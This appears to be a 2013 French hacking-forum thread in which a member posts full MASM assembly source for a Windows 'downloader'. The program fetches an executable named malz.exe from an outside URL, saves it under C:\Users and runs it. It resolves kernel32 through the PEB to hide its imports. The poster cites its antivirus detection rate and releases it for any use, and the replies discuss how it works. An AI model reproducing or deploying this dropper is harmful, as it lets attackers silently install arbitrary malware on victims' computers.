• STATISTIQUES
  • Il y a eu un total de 2 membres et 12802 visiteurs sur le site dans les dernières 24h pour un total de 12 804 personnes!


    Membres: 2 433
    Discussions: 3 585
    Messages: 32 832
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [FR] Secuser
    Actualité de la sécurité informatique, fiches virus et hoax, alertes par email, antivirus gratui...
    Hacking
    [FR] PHP France
    Pour tout savoir sur le PHP, en français. Vous trouverez des tutoriels, des exemples, des astuces, toute la do...
    Hacking
    [EN] Defcon
    Lancé en 1992 par Dark Tangent, DEFCON est la plus ancienne et la plus grande conférence underground de...
    Hacking
    [EN] PHPFreaks
    PHPFreaks est un site dédié à l'apprentissage et l'enseignement du PHP. Ici vous trouver...
    Programmation
    [EN] phrack
    Lot's of stuff !
    Hacking
    [EN] w3challs
    Ce site propose différents types de défis informatiques: piratage, craquage, cryptographie, stég...
    Hacking
    [FR] WeChall
    Audio: 3, Coding: 11, Cracking: 9, Crypto: 18, Encoding: 11, Exploit: 44, Forensics: 1, Fun: 6, HTTP: 6, Image: 8, Java:...
    Challenges

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
[MASM]Win32.Downloader
02-11-2013, 05h53 (Modification du message : 02-11-2013, 14h16 par EpicOut.)
Message : #1
EpicOut Hors ligne
Membre actif
*



Messages : 121
Sujets : 10
Points: 23
Inscription : Feb 2012
[MASM]Win32.Downloader
Hello, voici un downloader méga simple que j'ai fait via MASM, je l'ait fait pour le fun et pas pour faire chier des gens avec des malwares de merde, faites en ce que vous voulez, j'en ai rien à foutre, sous WTFPL, il est à 16/48 (plus maintenant, je l'ai scanné avec vt), si vous avez des questions sur son fonctionnement ou autre, n'hésitez pas à me mp, j'suis dispo.

Code :
.386
.model flat, stdcall
option casemap :none  ; case sensitive

include windows.inc

include kernel32.inc
includelib kernel32.lib

assume fs:nothing
.data
ExeFile db "http://www.epicworld.fr/malz.exe",0
PathTarget db "C:\Users\malz.exe",0
LpStartup STARTUPINFO <>
ProcessInfo PROCESS_INFORMATION <>
dll1 db "urlmon.dll",0
dllfunc1 db "URLDownloadToFileA",0
dllfunc2 db "CreateProcessA",0
signature db "Downloader by EpicOut - 2013",0
.data?
hModule dd ?
.code
start:
call download
call execute
call exit

download:
invoke LoadLibrary,addr dll1
invoke GetProcAddress,eax,addr dllfunc1
push NULL
push 0
push offset PathTarget
push offset ExeFile
push NULL
call eax
ret

execute:
call get_kernel32
invoke GetProcAddress,hModule,addr dllfunc2
push offset ProcessInfo
push offset LpStartup
push NULL
push NULL
push NULL
push TRUE
push NULL
push NULL
push NULL
push offset PathTarget
call eax
ret

exit:
invoke ExitProcess,0
ret

get_kernel32:
xor eax, eax
mov eax, fs:[30h]
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
mov ecx,2
loop_:
mov eax, [eax]
loop loop_
mov eax, [eax+18h]
mov hModule,eax
xor eax, eax
ret
end start
Plein de mouches peuvent rentrer en boucle close.
[Image: vQs9wRu.png]
+1 (3) -1 (0) Répondre
02-11-2013, 11h02
Message : #2
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Sujets : 51
Points: 34
Inscription : Sep 2012
RE: [MASM]Win32.Downloader
Cool ! Smile
j'ai jamais utilisé les fonctions GetProcAddress ! et je ne savais pas qu'on pouvais faire ca pour utiliser des fonction externe comme celles d'Urlmon !
C'est ce qu'on appel "chargé une dll en memoire " ?
+1 (0) -1 (0) Répondre
02-11-2013, 11h07 (Modification du message : 02-11-2013, 11h09 par EpicOut.)
Message : #3
EpicOut Hors ligne
Membre actif
*



Messages : 121
Sujets : 10
Points: 23
Inscription : Feb 2012
RE: [MASM]Win32.Downloader
Bah enfait, tant que tu as l'imagebase de la dll où se trouve ta fonction ça fonctionne.
Et ouais ça s'appelle charger en mémoire.
Plein de mouches peuvent rentrer en boucle close.
[Image: vQs9wRu.png]
+1 (0) -1 (0) Répondre
02-11-2013, 13h57
Message : #4
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Sujets : 51
Points: 34
Inscription : Sep 2012
RE: [MASM]Win32.Downloader
Faut vraiment ue je vois Le Format PE deja ^^
+1 (0) -1 (0) Répondre
02-11-2013, 14h06 (Modification du message : 02-11-2013, 14h06 par EpicOut.)
Message : #5
EpicOut Hors ligne
Membre actif
*



Messages : 121
Sujets : 10
Points: 23
Inscription : Feb 2012
RE: [MASM]Win32.Downloader
C'est pas sorcier, y'a pas mal de ressources sur le web, mais t'attends pas non plus à que tout soit documenté.
Plein de mouches peuvent rentrer en boucle close.
[Image: vQs9wRu.png]
+1 (0) -1 (0) Répondre
02-11-2013, 17h10
Message : #6
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Sujets : 51
Points: 34
Inscription : Sep 2012
RE: [MASM]Win32.Downloader
ouai nan mais je sais ou regarder ! j'ai deja lu sur re-xe.com
+1 (0) -1 (0) Répondre


Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  [MASM] Extracteur de dll pour Backdoor.Win32.Papras Horgh 10 2,252 25-04-2013, 13h41
Dernier message: Kiwazaru
  [C] [Win32] Injection de DLL dans un process avant son initialisation supersnail 4 1,715 26-03-2013, 23h27
Dernier message: fr0g

Atteindre :


Utilisateur(s) parcourant ce sujet : 3 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut